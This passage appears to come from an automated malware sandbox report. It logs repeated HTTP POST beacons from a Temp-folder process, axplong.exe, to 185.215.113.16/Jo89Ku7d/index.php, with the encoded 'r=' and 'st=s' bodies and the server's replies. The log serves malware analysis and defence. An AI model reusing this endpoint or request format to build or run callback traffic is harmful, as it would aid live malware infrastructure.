                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:18.597012043 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.449750185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:18.713906050 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:19.425087929 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:19.426007986 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:19.904092073 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.449751185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:20.023060083 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:20.733767033 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:20.734658957 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:21.210613012 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.449752185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:21.319447041 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:22.018805981 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:22.021414995 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:22.249141932 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.449753185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:22.366337061 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:23.088722944 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:23.089634895 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:23.324312925 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.449754185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:23.621750116 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:24.320278883 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:24.321151018 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:24.558545113 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.449755185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:24.679474115 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:25.372248888 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:25.373226881 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:25.596723080 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.449756185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:25.711108923 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:26.401568890 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:26.403621912 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:26.628310919 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.449757185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:26.742043972 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:27.479156971 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:27.480864048 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:27.704467058 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.449758185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:27.820770025 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:28.522046089 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:28.529462099 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:28.757508039 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.449759185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:28.891541004 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:29.599926949 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:29.601567984 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:29.830955982 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.449760185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:29.948928118 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:30.647969961 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:30.648828983 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:30.876790047 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.449761185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:30.991504908 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:31.710169077 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:31.740235090 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
